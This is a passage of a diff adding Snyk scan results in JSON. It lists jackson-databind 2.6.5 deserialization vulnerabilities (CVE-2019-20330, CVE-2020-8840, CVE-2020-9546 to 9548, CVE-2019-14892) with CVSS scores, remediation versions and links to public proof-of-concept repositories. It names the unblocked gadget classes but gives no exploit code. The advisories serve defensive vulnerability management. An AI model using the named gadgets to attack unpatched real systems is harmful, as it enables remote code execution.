"java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": 